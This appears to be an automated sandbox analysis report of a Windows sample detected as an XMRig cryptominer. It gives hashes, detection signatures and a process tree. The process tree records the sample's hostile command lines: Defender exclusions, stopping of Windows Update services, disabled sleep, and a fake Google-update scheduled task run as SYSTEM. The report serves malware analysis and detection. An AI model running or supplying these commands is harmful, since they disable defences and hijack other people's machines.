Analysis
max time kernel: 150s
max time network: 150s
platform: windows7_x64
resource: win7-20231020-en
resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
submitted: 07/11/2023, 17:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231020-en
General
-
Target
file.exe
-
Size
5.6MB
-
MD5
40253a5c2afc1bddfe2a9cb958b51a04
-
SHA1
9fb0a04691588e6c6dd300b76bb21f635baadaad
-
SHA256
345e2079dbfff1b00d5f13dc881b21383ab1d15e36739ac951df51dc0fa4f835
-
SHA512
f2a5e867578de904e1fd5e1f52230ea4b812bbc5deff0ef9a036150809aa9d271b679f67d54ee240d98cc974884e5854cc66cd8e1013c24dcf0d701509d38b2b
-
SSDEEP
98304:xTeyCFQywfwd3PquhdAl5a8Sgyr3XtM9jrU9ruoZ8D92JaXUz8+GCRbBxWQw:xqy+x5P5dK5HSgQX+9jrU1uoCB2JwSRI
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description | pid | Process | procid_target
PID 2176 created 1280 | 2176 | file.exe | 20
PID 2176 created 1280 | 2176 | file.exe | 20
PID 2176 created 1280 | 2176 | file.exe | 20
PID 2176 created 1280 | 2176 | file.exe | 20
PID 2176 created 1280 | 2176 | file.exe | 20
PID 2852 created 1280 | 2852 | updater.exe | 20
PID 2852 created 1280 | 2852 | updater.exe | 20
PID 2852 created 1280 | 2852 | updater.exe | 20
PID 2852 created 1280 | 2852 | updater.exe | 20
PID 2852 created 1280 | 2852 | updater.exe | 20
PID 2852 created 1280 | 2852 | updater.exe | 20
XMRig Miner payload 11 IoCs
resource | yara_rule
behavioral1/memory/2852-52-0x000000013FDE0000-0x000000014037C000-memory.dmp | xmrig
behavioral1/memory/1540-56-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1540-59-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1540-61-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1540-63-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1540-65-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1540-67-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1540-69-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1540-71-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1540-73-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1540-75-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid | Process
2852 | updater.exe
Loads dropped DLL 1 IoCs
pid | Process
2028 | taskeng.exe
Drops file in System32 directory 4 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 2852 set thread context of 1724 | 2852 | updater.exe | 70
PID 2852 set thread context of 1540 | 2852 | updater.exe | 71
Drops file in Program Files directory 2 IoCs
description | ioc | Process
File created | C:\Program Files\Google\Chrome\updater.exe | file.exe
File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
2680 | sc.exe
2644 | sc.exe
1684 | sc.exe
2820 | sc.exe
2836 | sc.exe
2032 | sc.exe
1096 | sc.exe
2136 | sc.exe
1956 | sc.exe
1676 | sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1696 | schtasks.exe
1908 | schtasks.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0c6eaad9c11da01 | powershell.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: LoadsDriver 1 IoCs
pid | Process
472 | Process not Found
Suspicious use of AdjustPrivilegeToken 14 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2848 | powershell.exe
Token: SeShutdownPrivilege | 2872 | powercfg.exe
Token: SeShutdownPrivilege | 2760 | powercfg.exe
Token: SeDebugPrivilege | 2652 | powershell.exe
Token: SeShutdownPrivilege | 2556 | powercfg.exe
Token: SeShutdownPrivilege | 2656 | powercfg.exe
Token: SeDebugPrivilege | 2404 | powershell.exe
Token: SeShutdownPrivilege | 1472 | powercfg.exe
Token: SeDebugPrivilege | 1040 | powershell.exe
Token: SeShutdownPrivilege | 2804 | powercfg.exe
Token: SeShutdownPrivilege | 2788 | powercfg.exe
Token: SeShutdownPrivilege | 1652 | powercfg.exe
Token: SeDebugPrivilege | 2852 | updater.exe
Token: SeLockMemoryPrivilege | 1540 | explorer.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
PID 1280: C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID 2176: C:\Users\Admin\AppData\Local\Temp\file.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
  PID 2848: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  PID 2812: C:\Windows\System32\cmd.exe
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    - Suspicious use of WriteProcessMemory
    PID 2680: C:\Windows\System32\sc.exe
      Command line: sc stop UsoSvc
      - Launches sc.exe
    PID 2644: C:\Windows\System32\sc.exe
      Command line: sc stop WaaSMedicSvc
      - Launches sc.exe
    PID 1684: C:\Windows\System32\sc.exe
      Command line: sc stop wuauserv
      - Launches sc.exe
    PID 2820: C:\Windows\System32\sc.exe
      Command line: sc stop bits
      - Launches sc.exe
    PID 2836: C:\Windows\System32\sc.exe
      Command line: sc stop dosvc
      - Launches sc.exe
  PID 2952: C:\Windows\System32\cmd.exe
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Suspicious use of WriteProcessMemory
    PID 2872: C:\Windows\System32\powercfg.exe
      Command line: powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    PID 2760: C:\Windows\System32\powercfg.exe
      Command line: powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
    PID 2556: C:\Windows\System32\powercfg.exe
      Command line: powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    PID 2656: C:\Windows\System32\powercfg.exe
      Command line: powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
  PID 2652: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#icrgqru#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID 1696: C:\Windows\system32\schtasks.exe
      Command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      - Creates scheduled task(s)
  PID 1752: C:\Windows\System32\schtasks.exe
    Command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  PID 2404: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  PID 812: C:\Windows\System32\cmd.exe
    Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    - Suspicious use of WriteProcessMemory
    PID 2032: C:\Windows\System32\sc.exe
      Command line: sc stop UsoSvc
      - Launches sc.exe
    PID 1096: C:\Windows\System32\sc.exe
      Command line: sc stop WaaSMedicSvc
      - Launches sc.exe
    PID 2136: C:\Windows\System32\sc.exe
      Command line: sc stop wuauserv
      - Launches sc.exe
    PID 1956: C:\Windows\System32\sc.exe
      Command line: sc stop bits
      - Launches sc.exe
    PID 1676: C:\Windows\System32\sc.exe
      Command line: sc stop dosvc
      - Launches sc.exe
  PID 444: C:\Windows\System32\cmd.exe
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Suspicious use of WriteProcessMemory
    PID 1472: C:\Windows\System32\powercfg.exe
      Command line: powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    PID 2804: C:\Windows\System32\powercfg.exe
      Command line: powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
    PID 2788: C:\Windows\System32\powercfg.exe
      Command line: powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    PID 1652: C:\Windows\System32\powercfg.exe
      Command line: powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
  PID 1040: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#icrgqru#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID 1908: C:\Windows\system32\schtasks.exe
      Command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      - Creates scheduled task(s)
  PID 1724: C:\Windows\System32\conhost.exe
    Command line: C:\Windows\System32\conhost.exe
  PID 1540: C:\Windows\explorer.exe
    Command line: C:\Windows\explorer.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
PID 2028: C:\Windows\system32\taskeng.exe
  Command line: taskeng.exe {B1963E01-2112-4589-AB4D-51590E5D4C5D} S-1-5-18:NT AUTHORITY\System:Service:
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID 2852: C:\Program Files\Google\Chrome\updater.exe
    Command line: "C:\Program Files\Google\Chrome\updater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
5.6MB
MD540253a5c2afc1bddfe2a9cb958b51a04
SHA19fb0a04691588e6c6dd300b76bb21f635baadaad
SHA256345e2079dbfff1b00d5f13dc881b21383ab1d15e36739ac951df51dc0fa4f835
SHA512f2a5e867578de904e1fd5e1f52230ea4b812bbc5deff0ef9a036150809aa9d271b679f67d54ee240d98cc974884e5854cc66cd8e1013c24dcf0d701509d38b2b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD587de92db150a43a2aa9ad7ae7bdedd50
SHA14cfb5e0145a1ce16a4692fc40bf94025ef33b919
SHA2566d2c4e8fdbd6660e7dd9a62e205a5bf0883f7fa080912071016897e0942131f9
SHA512cb8d7f0a0259d030a15710705d279854c2948ffff80a98c69ed6e57fbc84a39db17a4087becbe13db9e6ecfbc980771977820a7bee9f8d8c0974cc47f38a9927
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G0M7XD9C7E2ETLK5B0IV.temp
Filesize7KB
MD587de92db150a43a2aa9ad7ae7bdedd50
SHA14cfb5e0145a1ce16a4692fc40bf94025ef33b919
SHA2566d2c4e8fdbd6660e7dd9a62e205a5bf0883f7fa080912071016897e0942131f9
SHA512cb8d7f0a0259d030a15710705d279854c2948ffff80a98c69ed6e57fbc84a39db17a4087becbe13db9e6ecfbc980771977820a7bee9f8d8c0974cc47f38a9927